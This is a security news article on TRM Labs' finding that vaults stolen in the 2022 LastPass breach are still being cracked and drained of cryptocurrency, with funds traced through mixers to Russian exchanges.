Encrypted vault backups stolen during the 2022 LastPass incident are still being successfully attacked, with threat actors leveraging weak master passwords to decrypt vaults and empty cryptocurrency accounts as late as the end of 2025, according to new analysis from TRM Labs.

The blockchain intelligence firm said on-chain evidence indicates participation by Russian cybercriminal groups, noting that one Russian exchange continued to receive funds tied to compromised LastPass vaults as recently as October.

This conclusion is “based on the totality of on-chain evidence – including repeated interaction with Russia-associated infrastructure, continuity of control across pre-and post-mix activity, and the consistent use of high-risk Russian exchanges as off-ramps,” it added.

LastPass a major compromise in 2022 that allowed intruders to obtain customer personal data and encrypted password vaults, including credentials such as cryptocurrency private keys and seed phrases.

Earlier this month, the password manager was by the U.K. Information Commissioner’s Office (ICO) for failing to deploy adequate technical and security controls to prevent the breach.

The original breach notification also flagged the risk that adversaries could use offline brute-force attacks to guess master passwords and decrypt stolen vaults. TRM Labs’ latest work shows that this attack path is actively being used.

“Any vault protected by a weak master password could eventually be decrypted offline, turning a single 2022 intrusion into a multi-year window for attackers to quietly crack passwords and drain assets over time,” the company said.

“As users failed to rotate passwords or improve vault security, attackers continued to crack weak master passwords years later – leading to wallet drains as recently as late 2025.”

The links between the 2022 LastPass vault theft and Russian actors are based on two main elements: the consistent use of exchanges long associated with the Russian cybercrime ecosystem in the laundering chain, and operational correlations identified from wallets interacting with mixers both before and after the mixing and laundering stages.

More than $35 million in stolen digital assets has been traced, with $28 million converted to Bitcoin and laundered via Wasabi Wallet between late 2024 and early 2025. A further $7 million is tied to a second wave observed in September 2025.

The diverted funds were funneled through Cryptomixer.io and then off-ramped via Cryptex and Audia6, two Russian exchanges linked to illicit activity. Notably, Cryptex was by the U.S. Treasury Department in September 2024 for handling more than $51.2 million in ransomware-derived proceeds.

TRM Labs said it was able to unravel the mixing flow despite the use of CoinJoin techniques intended to obscure fund movement, identifying clusters of withdrawals and peeling chains that directed mixed Bitcoin into the two exchanges.

“This is a clear example of how a single breach can evolve into a multi-year theft campaign,” said Ari Redbord, global head of policy at TRM Labs. “Even when mixers are used, operational patterns, infrastructure reuse, and off-ramp behavior can still reveal who’s really behind the activity.”

“Russian high-risk exchanges continue to serve as critical off-ramps for global cybercrime. This case shows why demixing and ecosystem-level analysis are now essential tools for attribution and enforcement.”

Found this article useful for your monitoring and investigations? Follow us on Google News, Twitter and LinkedIn for more coverage relevant to SOC detections, response, and threat intel.